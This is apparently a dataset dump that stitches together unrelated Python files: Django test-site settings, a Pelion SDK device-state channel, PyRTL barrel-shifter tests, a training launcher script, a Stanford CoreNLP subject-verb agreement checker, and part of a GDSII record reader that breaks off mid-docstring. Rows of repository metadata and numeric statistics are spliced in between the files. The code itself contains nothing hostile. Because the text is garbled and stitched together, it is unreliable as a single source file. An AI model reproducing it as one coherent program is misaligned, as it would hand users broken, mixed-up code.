# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# Application definition
INSTALLED_APPS = (
'django_extensions',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'multitier',
'testsite',
)
MIDDLEWARE = (
'multitier.middleware.SiteMiddleware',
'multitier.middleware.SetRemoteAddrFromForwardedFor',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
MIDDLEWARE_CLASSES = MIDDLEWARE
ROOT_URLCONF = 'testsite.urls'
WSGI_APPLICATION = 'testsite.wsgi.application'
# Templates
# ---------
TEMPLATE_DEBUG = True
# Django 1.7 and below
TEMPLATE_LOADERS = (
'multitier.loaders.django.Loader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.media',
'django.core.context_processors.static',
'multitier.context_processors.site',
'multitier.context_processors.features_debug'
)
TEMPLATE_DIRS = (
BASE_DIR + '/testsite/templates',
)
# Django 1.8+
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': TEMPLATE_DIRS,
'OPTIONS': {
'context_processors': [proc.replace(
'django.core.context_processors',
'django.template.context_processors')
for proc in TEMPLATE_CONTEXT_PROCESSORS],
'loaders': TEMPLATE_LOADERS},
},
]
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASE_ROUTERS = ('multitier.routers.SiteRouter',)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite')
}
}
if os.getenv('MULTITIER_DB_FILE'):
MULTITIER_DB_FILE = os.getenv('MULTITIER_DB_FILE')
MULTITIER_DB_NAME = os.path.splitext(
os.path.basename(MULTITIER_DB_FILE))[0]
DATABASES.update({MULTITIER_DB_NAME: {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': MULTITIER_DB_FILE,
}})
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR + '/testsite/media'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_ROOT = BASE_DIR + '/testsite/static'
STATIC_URL = '/static/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'logfile':{
'level':'DEBUG',
'class':'logging.StreamHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'multitier': {
'handlers': ['logfile'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
# 'django.db.backends': {
# 'handlers': ['logfile'],
# 'level': 'DEBUG',
# 'propagate': True,
# },
}
}
LOGIN_REDIRECT_URL = 'accounts_profile'
| 29.275362 | 80 | 0.607756 | 639 | 6,060 | 5.635368 | 0.400626 | 0.039711 | 0.036656 | 0.041655 | 0.133296 | 0.10025 | 0.081922 | 0.063038 | 0.022216 | 0 | 0 | 0.006686 | 0.259571 | 6,060 | 206 | 81 | 29.417476 | 0.795855 | 0.230363 | 0 | 0.059259 | 0 | 0 | 0.37744 | 0.241866 | 0 | 0 | 0 | 0.004854 | 0 | 1 | 0.007407 | false | 0 | 0.014815 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84e8a6736cf9d27a7da833746cbb7a06fdccfc8 | 3,774 | py | Python | src/mbed_cloud/subscribe/channels/device_state_changes.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 12 | 2017-12-28T11:18:43.000Z | 2020-10-04T12:11:15.000Z | src/mbed_cloud/subscribe/channels/device_state_changes.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 50 | 2017-12-21T12:50:41.000Z | 2020-01-13T16:07:08.000Z | src/mbed_cloud/subscribe/channels/device_state_changes.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 8 | 2018-04-25T17:47:29.000Z | 2019-08-29T06:38:27.000Z | # --------------------------------------------------------------------------
# Pelion Device Management SDK
# (C) COPYRIGHT 2017 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""A Channels API module"""
from __future__ import absolute_import
from mbed_cloud.subscribe.channels.channel import ChannelIdentifiers
from mbed_cloud.subscribe.channels.channel import ChannelSubscription
from mbed_cloud.subscribe.subscribe import expand_dict_as_keys
class DeviceStateChanges(ChannelSubscription):
"""Triggers on changes to registration state of devices"""
def __init__(self, device_id=None, **extra_filters):
"""Triggers on changes to registration state of devices
.. warning:: This functionality is considered experimental;
the interface may change in future releases
:param device_id: a device identifier
:param extra_filters: additional filters e.g. dict(channel=API_CHANNELS.registrations)
"""
super(DeviceStateChanges, self).__init__()
self._route_keys = expand_dict_as_keys(dict(
channel=[
ChannelIdentifiers.de_registrations,
ChannelIdentifiers.reg_updates,
ChannelIdentifiers.registrations_expired,
ChannelIdentifiers.registrations,
],
))
self._optional_filters = {}
if device_id is not None:
self._optional_filters['device_id'] = device_id
self._optional_filters.update(extra_filters)
@staticmethod
def _map_resource_data(resource_data):
attribute_map = {
"path": "path",
"rt": "type",
"ct": "content_type",
"obs": "observable"
}
new_items = map(
lambda item: (item[1], resource_data.get(item[0], None)),
attribute_map.items()
)
return dict(new_items)
@staticmethod
def _map_endpoint_data(endpoint_data):
attribute_map = {
"ep": "device_id",
"original_ep": "alias",
"ept": "device_type",
"q": "queue_mode",
"channel": "channel"
}
output = dict(map(
lambda item: (item[1], endpoint_data.get(item[0], None)),
attribute_map.items()
))
output["resources"] = list(map(
DeviceStateChanges._map_resource_data, endpoint_data.get("resources", [])
))
return output
def start(self):
"""Start the channel"""
super(DeviceStateChanges, self).start()
# n.b. No true start/stop implementation as DeviceState is permanently subscribed
self._api.ensure_notifications_thread()
def notify(self, data):
"""Notify this channel of inbound data"""
string_channels = {
ChannelIdentifiers.de_registrations,
ChannelIdentifiers.registrations_expired
}
if data['channel'] in string_channels:
message = {'device_id': data["value"], 'channel': data["channel"]}
else:
message = DeviceStateChanges._map_endpoint_data(data)
return super(DeviceStateChanges, self).notify(message)
| 34.944444 | 94 | 0.620297 | 397 | 3,774 | 5.700252 | 0.425693 | 0.024746 | 0.017234 | 0.029165 | 0.122846 | 0.106938 | 0.106938 | 0.068935 | 0 | 0 | 0 | 0.004252 | 0.252252 | 3,774 | 107 | 95 | 35.271028 | 0.797661 | 0.324324 | 0 | 0.177419 | 0 | 0 | 0.068504 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.080645 | false | 0 | 0.064516 | 0 | 0.209677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a84f9de68045c4d14dd04bfc02dff0e790085a22 | 2,452 | py | Python | tests/rtllib/test_barrel.py | ryoon/PyRTL | 71a927afa6e8a1a00204cf42abde2514867c921e | [
"BSD-3-Clause"
] | null | null | null | tests/rtllib/test_barrel.py | ryoon/PyRTL | 71a927afa6e8a1a00204cf42abde2514867c921e | [
"BSD-3-Clause"
] | null | null | null | tests/rtllib/test_barrel.py | ryoon/PyRTL | 71a927afa6e8a1a00204cf42abde2514867c921e | [
"BSD-3-Clause"
] | null | null | null | import unittest
import random
import pyrtl
from pyrtl.rtllib import barrel
class TestBarrel(unittest.TestCase):
# @classmethod
# def setUpClass(cls):
# # this is to ensure reproducibility
# random.seed(777906374)
def setUp(self):
pyrtl.reset_working_block()
self.inp_val = pyrtl.Input(8, 'inp_val')
self.inp_shift = pyrtl.Input(2, 'inp_shift')
self.out_zeros = pyrtl.Output(18, 'out_zeros')
self.out_ones = pyrtl.Output(18, 'out_ones')
def test_shift_left(self):
random.seed(777906373)
zero = pyrtl.Const(0, 1)
one = pyrtl.Const(1, 1)
self.out_zeros <<= barrel.barrel_shifter(self.inp_val, zero, one, self.inp_shift)
self.out_ones <<= barrel.barrel_shifter(self.inp_val, one, one, self.inp_shift)
sim_trace = pyrtl.SimulationTrace()
sim = pyrtl.Simulation(tracer=sim_trace)
vals = [random.randint(0, 20) for v in range(20)]
shifts = [random.randint(0, 3) for s in range(20)]
for i in range(len(vals)):
sim.step({
self.inp_val: vals[i],
self.inp_shift: shifts[i]
})
base_sum = vals[i] * pow(2, shifts[i])
self.assertEquals(sim.inspect(self.out_zeros), base_sum)
self.assertEquals(sim.inspect(self.out_ones), base_sum + pow(2, shifts[i]) - 1)
def test_shift_right(self):
random.seed(777906374)
zero = pyrtl.Const(0, 1)
one = pyrtl.Const(1, 1)
self.out_zeros <<= barrel.barrel_shifter(self.inp_val, zero, zero, self.inp_shift)
self.out_ones <<= barrel.barrel_shifter(self.inp_val, one, zero, self.inp_shift)
sim_trace = pyrtl.SimulationTrace()
sim = pyrtl.Simulation(tracer=sim_trace)
vals = [random.randint(0, 20) for v in range(20)]
shifts = [random.randint(0, 3) for s in range(20)]
for i in range(len(vals)):
sim.step({
self.inp_val: vals[i],
self.inp_shift: shifts[i]
})
base_sum = int(vals[i] / pow(2, shifts[i]))
self.assertEqual(sim.inspect(self.out_zeros), base_sum, "failed on value %d" % vals[i])
extra_sum = sum([pow(2, len(self.inp_val) - b - 1) for b in range(shifts[i])])
self.assertEquals(sim.inspect(self.out_ones), base_sum + extra_sum,
"failed on value %d" % vals[i])
| 40.866667 | 99 | 0.595432 | 343 | 2,452 | 4.107872 | 0.227405 | 0.074521 | 0.056778 | 0.065295 | 0.651526 | 0.651526 | 0.651526 | 0.572747 | 0.53939 | 0.476934 | 0 | 0.036558 | 0.274878 | 2,452 | 59 | 100 | 41.559322 | 0.755906 | 0.040375 | 0 | 0.44898 | 0 | 0 | 0.029399 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 1 | 0.061224 | false | 0 | 0.081633 | 0 | 0.163265 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8514bbfb63dbbb2d0407c295ba64862f4ef0007 | 918 | py | Python | train_from_checkpoint.py | harry-uglow/Curriculum-Reinforcement-Learning | cb050556e1fdc7b7de8d63ad932fc712a35ac144 | [
"MIT"
] | 15 | 2020-02-02T22:22:41.000Z | 2022-03-03T07:50:45.000Z | train_from_checkpoint.py | harry-uglow/Deep-RL-Sim2Real | cb050556e1fdc7b7de8d63ad932fc712a35ac144 | [
"MIT"
] | 8 | 2020-01-28T20:45:54.000Z | 2022-03-14T07:58:27.000Z | train_from_checkpoint.py | harry-uglow/Curriculum-Reinforcement-Learning | cb050556e1fdc7b7de8d63ad932fc712a35ac144 | [
"MIT"
] | 5 | 2020-03-26T15:46:51.000Z | 2022-01-17T09:48:02.000Z | import os
from main import args
if __name__ == "__main__":
pipeline_base = args.pipeline
results = []
tags = []
save_base = args.save_as
target = args.trg_succ_rate
for i in range(5):
length = f"{2**i}cm"
curr_pipeline = f"{args.pipeline}_{2**i}"
args.trg_succ_rate = target
for seed in [0, 16, 32]:
print(f"Training with {length} curriculum (if available)...")
try:
os.system(f"python main.py --save-as {save_base}_{length} --scene-name dish_rack "
f"--num-steps 256 --num-processes 16 --no-cuda --eval-interval 4 "
f"--initial-policy {save_base}_{length}_{seed}_dish_rack_11 "
f"--reuse-residual --trg-succ-rate {args.trg_succ_rate} "
f"--pipeline rack_res")
except KeyError:
continue
| 35.307692 | 98 | 0.539216 | 116 | 918 | 4.017241 | 0.525862 | 0.060086 | 0.094421 | 0.096567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026273 | 0.336601 | 918 | 25 | 99 | 36.72 | 0.738916 | 0 | 0 | 0 | 0 | 0 | 0.38386 | 0.067612 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8542643da025c6082b1912116a149f8d9ed2712 | 1,613 | py | Python | ch7/7_3_SVArule.py | bronevet-abc/NLPython | edb2f2c558215df556449c0fafb717d3442cfd9b | [
"MIT"
] | null | null | null | ch7/7_3_SVArule.py | bronevet-abc/NLPython | edb2f2c558215df556449c0fafb717d3442cfd9b | [
"MIT"
] | null | null | null | ch7/7_3_SVArule.py | bronevet-abc/NLPython | edb2f2c558215df556449c0fafb717d3442cfd9b | [
"MIT"
] | null | null | null | from pycorenlp import StanfordCoreNLP
from nltk.tree import Tree
nlp = StanfordCoreNLP('http://localhost:9000')
def rulelogic(sentnece):
leaves_list = []
text = (sentnece)
output = nlp.annotate(text, properties={
'annotators': 'tokenize,ssplit,pos,depparse,parse',
'outputFormat': 'json'
})
parsetree = output['sentences'][0]['parse']
#print parsetree
for i in Tree.fromstring(parsetree).subtrees():
if i.label() == 'PRP':
#print i.leaves(), i.label()
leaves_list.append(i.leaves())
if i.label() == 'VBP' or i.label() == 'VBZ':
#print i.leaves(), i.label()
leaves_list.append(i.label())
#print leaves_list
if (any("We" in x for x in leaves_list) or any("I" in x for x in leaves_list) or any(
"You" in x for x in leaves_list) or any("They" in x for x in leaves_list)) and any("VBZ" in x for x in leaves_list):
print("Alert: \nPlease check Subject and verb in the sentence.\nYou may have plural subject and singular verb. ")
elif(any("He" in x for x in leaves_list) or any("She" in x for x in leaves_list) or any(
"It" in x for x in leaves_list)) and any("VBP" in x for x in leaves_list):
print("Alert: \nPlease check subject and verb in the sentence.\n" \
"You may have singular subject and plural verb.")
else:
print("You have correct sentence.")
if __name__ == "__main__":
rulelogic('We know cooking.')
# 'He drink tomato soup in the morning.'
# 'We plays game online.
# She know cooking.
| 40.325 | 136 | 0.615623 | 237 | 1,613 | 4.101266 | 0.333333 | 0.133745 | 0.055556 | 0.064815 | 0.386831 | 0.386831 | 0.386831 | 0.386831 | 0.386831 | 0.139918 | 0 | 0.004188 | 0.259764 | 1,613 | 39 | 137 | 41.358974 | 0.809883 | 0.102914 | 0 | 0 | 0 | 0.037037 | 0.266667 | 0.023611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a854da79478676b3e52986d8ebfc520db2a322db | 17,336 | py | Python | litho/gdsii/record.py | xj361685640/DimmiLitho | 2d3d335bdab8ae628f328c264b655b180881e3a1 | [
"MIT"
] | 32 | 2016-05-27T07:35:44.000Z | 2022-03-24T07:53:03.000Z | litho/gdsii/record.py | xj361685640/DimmiLitho | 2d3d335bdab8ae628f328c264b655b180881e3a1 | [
"MIT"
] | 2 | 2021-05-04T03:09:48.000Z | 2021-12-04T17:24:55.000Z | litho/gdsii/record.py | xj361685640/DimmiLitho | 2d3d335bdab8ae628f328c264b655b180881e3a1 | [
"MIT"
] | 18 | 2017-06-27T06:16:34.000Z | 2022-03-21T06:52:35.000Z | # -*- coding: utf-8 -*-
#
# Copyright © 2010 Eugeniy Meshcheryakov <eugen@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
:mod:`gdsii.record` --- GDSII record I/O
========================================
This module contains classes for low-level GDSII I/O.
.. moduleauthor:: Eugeniy Meshcheryakov <eugen@debian.org>
"""
import math
import struct
from datetime import datetime
from . import exceptions, tags, types
__all__ = ["Record", "Reader"]
_RECORD_HEADER_FMT = struct.Struct(">HH")
def _parse_nodata(data):
"""Parse :const:`NODATA` data type. Does nothing."""
def _parse_bitarray(data):
"""
Parse :const:`BITARRAY` data type.
>>> _parse_bitarray(b'ab') # ok, 2 bytes
24930
>>> _parse_bitarray(b'abcd') # too long
Traceback (most recent call last):
...
IncorrectDataSize: BITARRAY
>>> _parse_bitarray('') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: BITARRAY
"""
if len(data) != 2:
raise exceptions.IncorrectDataSize("BITARRAY")
(val,) = struct.unpack(">H", data)
return val
def _parse_int2(data):
"""
Parse INT2 data type.
>>> _parse_int2(b'abcd') # ok, even number of bytes
(24930, 25444)
>>> _parse_int2(b'abcde') # odd number of bytes
Traceback (most recent call last):
...
IncorrectDataSize: INT2
>>> _parse_int2(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: INT2
"""
data_len = len(data)
if not data_len or (data_len % 2):
raise exceptions.IncorrectDataSize("INT2")
return struct.unpack(">%dh" % (data_len // 2), data)
def _parse_int4(data):
"""
Parse INT4 data type.
>>> _parse_int4(b'abcd')
(1633837924,)
>>> _parse_int4(b'abcdef') # not divisible by 4
Traceback (most recent call last):
...
IncorrectDataSize: INT4
>>> _parse_int4(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: INT4
"""
data_len = len(data)
if not data_len or (data_len % 4):
raise exceptions.IncorrectDataSize("INT4")
return struct.unpack(">%dl" % (data_len // 4), data)
def _int_to_real(num):
"""
Convert REAL8 from internal integer representation to Python reals.
Zeroes:
>>> print(_int_to_real(0x0))
0.0
>>> print(_int_to_real(0x8000000000000000)) # negative
0.0
>>> print(_int_to_real(0xff00000000000000)) # denormalized
0.0
Others:
>>> print(_int_to_real(0x4110000000000000))
1.0
>>> print(_int_to_real(0xC120000000000000))
-2.0
"""
sgn = -1 if 0x8000000000000000 & num else 1
mant = num & 0x00FFFFFFFFFFFFFF
exp = (num >> 56) & 0x7F
return math.ldexp(sgn * mant, 4 * (exp - 64) - 56)
def _parse_real8(data):
"""
Parse REAL8 data type.
>>> _parse_real8(struct.pack('>3Q', 0x0, 0x4110000000000000, 0xC120000000000000))
(0.0, 1.0, -2.0)
>>> _parse_real8(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: REAL8
>>> _parse_real8(b'abcd') # not divisible by 8
Traceback (most recent call last):
...
IncorrectDataSize: REAL8
"""
data_len = len(data)
if not data_len or (data_len % 8):
raise exceptions.IncorrectDataSize("REAL8")
ints = struct.unpack(">%dQ" % (data_len // 8), data)
return tuple(_int_to_real(n) for n in ints)
def _parse_ascii(data):
r"""
Parse ASCII data type.
>>> _parse_ascii(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: ASCII
>>> _parse_ascii(b'abcde') == b'abcde'
True
>>> _parse_ascii(b'abcde\0') == b'abcde' # strips trailing NUL
True
"""
if not len(data):
raise exceptions.IncorrectDataSize("ASCII")
# XXX cross-version compatibility
if data[-1:] == b"\0":
return data[:-1]
return data
_PARSE_FUNCS = {
types.NODATA: _parse_nodata,
types.BITARRAY: _parse_bitarray,
types.INT2: _parse_int2,
types.INT4: _parse_int4,
types.REAL8: _parse_real8,
types.ASCII: _parse_ascii,
}
def _pack_nodata(data):
"""
Pack NODATA tag data. Should always return empty string::
>>> packed = _pack_nodata([])
>>> packed == b''
True
>>> len(packed)
0
"""
return b""
def _pack_bitarray(data):
"""
Pack BITARRAY tag data.
>>> packed = _pack_bitarray(123)
>>> packed == struct.pack('>H', 123)
True
>>> len(packed)
2
"""
return struct.pack(">H", data)
def _pack_int2(data):
"""
Pack INT2 tag data.
>>> _pack_int2([1, 2, -3]) == struct.pack('>3h', 1, 2, -3)
True
>>> packed = _pack_int2((1, 2, 3))
>>> packed == struct.pack('>3h', 1, 2, 3)
True
>>> len(packed)
6
"""
size = len(data)
return struct.pack(">{0}h".format(size), *data)
def _pack_int4(data):
"""
Pack INT4 tag data.
>>> _pack_int4([1, 2, -3]) == struct.pack('>3l', 1, 2, -3)
True
>>> packed = _pack_int4((1, 2, 3))
>>> packed == struct.pack('>3l', 1, 2, 3)
True
>>> len(packed)
12
"""
size = len(data)
return struct.pack(">{0}l".format(size), *data)
def _real_to_int(fnum):
"""
Convert REAL8 from Python real to internal integer representation.
>>> '0x%016x' % _real_to_int(0.0)
'0x0000000000000000'
>>> print(_int_to_real(_real_to_int(1.0)))
1.0
>>> print(_int_to_real(_real_to_int(-2.0)))
-2.0
>>> print(_int_to_real(_real_to_int(1e-9)))
1e-09
"""
# first convert number to IEEE double and split it in parts
(ieee,) = struct.unpack("=Q", struct.pack("=d", fnum))
sign = ieee & 0x8000000000000000
ieee_exp = (ieee >> 52) & 0x7FF
ieee_mant = ieee & 0xFFFFFFFFFFFFF
if ieee_exp == 0:
# zero or denormals
# TODO maybe handle denormals
return 0
# substract exponent bias
unb_ieee_exp = ieee_exp - 1023
# add leading one and move to GDSII position
ieee_mant_full = (ieee_mant + 0x10000000000000) << 3
# convert exponent to 16-based, +1 for differences in presentation
# of mantissa (1.xxxx in EEEE and 0.1xxxxx in GDSII
exp16, rest = divmod(unb_ieee_exp + 1, 4)
# compensate exponent converion
if rest:
rest = 4 - rest
exp16 += 1
ieee_mant_comp = ieee_mant_full >> rest
# add GDSII exponent bias
exp16_biased = exp16 + 64
# try to fit everything
if exp16_biased < -14:
return 0 # number is too small. FIXME is it possible?
elif exp16_biased < 0:
ieee_mant_comp = ieee_mant_comp >> (exp16_biased * 4)
exp16_biased = 0
elif exp16_biased > 0x7F:
raise exceptions.FormatError("number is to big for REAL8")
return sign | (exp16_biased << 56) | ieee_mant_comp
def _pack_real8(data):
"""
Pack REAL8 tag data.
>>> packed = _pack_real8([0, 1, -1, 0.5, 1e-9])
>>> len(packed)
40
>>> list(map(str, _parse_real8(packed)))
['0.0', '1.0', '-1.0', '0.5', '1e-09']
"""
size = len(data)
return struct.pack(">{0}Q".format(size), *[_real_to_int(num) for num in data])
def _pack_ascii(data):
r"""
Pack ASCII tag data.
>>> _pack_ascii(b'abcd') == b'abcd'
True
>>> _pack_ascii(b'abc') == b'abc\0'
True
"""
size = len(data)
if size % 2:
return data + b"\0"
return data
_PACK_FUNCS = {
types.NODATA: _pack_nodata,
types.BITARRAY: _pack_bitarray,
types.INT2: _pack_int2,
types.INT4: _pack_int4,
types.REAL8: _pack_real8,
types.ASCII: _pack_ascii,
}
class Record(object):
"""
Class for representing a GDSII record with attached data.
Example::
>>> r = Record(tags.STRNAME, 'my_structure')
>>> '%04x' % r.tag
'0606'
>>> r.tag_name
'STRNAME'
>>> r.tag_type
6
>>> r.tag_type_name
'ASCII'
>>> r.data
'my_structure'
>>> r = Record(0xffff, 'xxx') # Unknown tag type
>>> r.tag_name
'0xffff'
>>> r.tag_type_name
'0xff'
"""
__slots__ = ["tag", "data"]
def __init__(self, tag, data=None, points=None, times=None, acls=None):
"""Initialize with tag and parsed data."""
self.tag = tag
if data is not None:
self.data = data
elif points is not None:
new_data = []
# TODO make it faster
for point in points:
new_data.append(point[0])
new_data.append(point[1])
self.data = new_data
elif times is not None:
mod_time = times[0]
acc_time = times[1]
self.data = (
mod_time.year - 1900,
mod_time.month,
mod_time.day,
mod_time.hour,
mod_time.minute,
mod_time.second,
acc_time.year - 1900,
acc_time.month,
acc_time.day,
acc_time.hour,
acc_time.minute,
acc_time.second,
)
elif acls is not None:
new_data = []
for acl in acls:
new_data.extend(acl)
self.data = new_data
else:
self.data = None
def check_tag(self, tag):
"""
Checks if current record has the same tag as the given one.
Raises :exc:`MissingRecord` exception otherwise. For example::
>>> rec = Record(tags.STRNAME, b'struct')
>>> rec.check_tag(tags.STRNAME)
>>> rec.check_tag(tags.DATATYPE)
Traceback (most recent call last):
...
MissingRecord: Wanted: 3586, got: STRNAME
"""
if self.tag != tag:
raise exceptions.MissingRecord("Wanted: %s, got: %s" % (tag, self.tag_name))
def check_size(self, size):
"""
Checks if data size equals to the given size.
Raises :exc:`DataSizeError` otherwise. For example::
>>> rec = Record(tags.DATATYPE, (0,))
>>> rec.check_size(1)
>>> rec.check_size(5)
Traceback (most recent call last):
...
DataSizeError: 3586
"""
if len(self.data) != size:
raise exceptions.DataSizeError(self.tag)
@classmethod
def read(cls, stream):
"""
Read a GDSII record from file.
:param stream: GDS file opened for reading in binary mode
:returns: a new :class:`Record` instance
:raises: :exc:`UnsupportedTagType` if data cannot be parsed
:raises: :exc:`EndOfFileError` if end of file is reached
"""
header = stream.read(4)
if not header or len(header) != 4:
raise exceptions.EndOfFileError
data_size, tag = _RECORD_HEADER_FMT.unpack(header)
if data_size < 4:
raise exceptions.IncorrectDataSize("data size is too small")
if data_size % 2:
raise exceptions.IncorrectDataSize("data size is odd")
data_size -= 4 # substract header size
data = stream.read(data_size)
if len(data) != data_size:
raise exceptions.EndOfFileError
tag_type = tags.type_of_tag(tag)
try:
parse_func = _PARSE_FUNCS[tag_type]
except KeyError:
raise exceptions.UnsupportedTagType(tag_type)
return cls(tag, parse_func(data))
def save(self, stream):
"""
Save record to a GDS file.
:param stream: file opened for writing in binary mode
:raises: :exc:`UnsupportedTagType` if tag type is not supported
:raises: :exc:`FormatError` on incorrect data sizes, etc
:raises: whatever :func:`struct.pack` can raise
"""
tag_type = self.tag_type
try:
pack_func = _PACK_FUNCS[tag_type]
except KeyError:
raise exceptions.UnsupportedTagType(tag_type)
packed_data = pack_func(self.data)
record_size = len(packed_data) + 4
if record_size > 0xFFFF:
raise exceptions.FormatError("data size is too big")
header = _RECORD_HEADER_FMT.pack(record_size, self.tag)
stream.write(header)
stream.write(packed_data)
@property
def tag_name(self):
"""Tag name, if known, otherwise tag ID formatted as hex number."""
if self.tag in tags.REV_DICT:
return tags.REV_DICT[self.tag]
return "0x%04x" % self.tag
@property
def tag_type(self):
"""Tag data type ID."""
return tags.type_of_tag(self.tag)
@property
def tag_type_name(self):
"""Tag data type name, if known, and formatted number otherwise."""
tag_type = tags.type_of_tag(self.tag)
if tag_type in types.REV_DICT:
return types.REV_DICT[tag_type]
return "0x%02x" % tag_type
@property
def points(self):
"""
Convert data to list of points. Useful for :const:`XY` record.
Raises :exc:`DataSizeError` if data size is incorrect.
For example::
>>> r = Record(tags.XY, [0, 1, 2, 3])
>>> r.points
[(0, 1), (2, 3)]
>>> r = Record(tags.XY, []) # not allowed
>>> r.points
Traceback (most recent call last):
...
DataSizeError: 4099
>>> r = Record(tags.XY, [1, 2, 3]) # odd number of coordinates
>>> r.points
Traceback (most recent call last):
...
DataSizeError: 4099
"""
data_size = len(self.data)
if not data_size or (data_size % 2):
raise exceptions.DataSizeError(self.tag)
return [(self.data[i], self.data[i + 1]) for i in range(0, data_size, 2)]
@property
def times(self):
"""
Convert data to tuple ``(modification time, access time)``.
Useful for :const:`BGNLIB` and :const:`BGNSTR`.
>>> r = Record(tags.BGNLIB, [100, 1, 1, 1, 2, 3, 110, 8, 14, 21, 10, 35])
>>> print(r.times[0].isoformat())
2000-01-01T01:02:03
>>> print(r.times[1].isoformat())
2010-08-14T21:10:35
>>> r = Record(tags.BGNLIB, [100, 1, 1, 1, 2, 3]) # wrong data length
>>> r.times
Traceback (most recent call last):
...
DataSizeError: 258
"""
if len(self.data) != 12:
raise exceptions.DataSizeError(self.tag)
return (
datetime(self.data[0] + 1900, *self.data[1:6]),
datetime(self.data[6] + 1900, *self.data[7:12]),
)
@property
def acls(self):
"""
Convert data to list of acls ``(GID, UID, ACCESS)``.
Useful for :const:`LIBSECUR`.
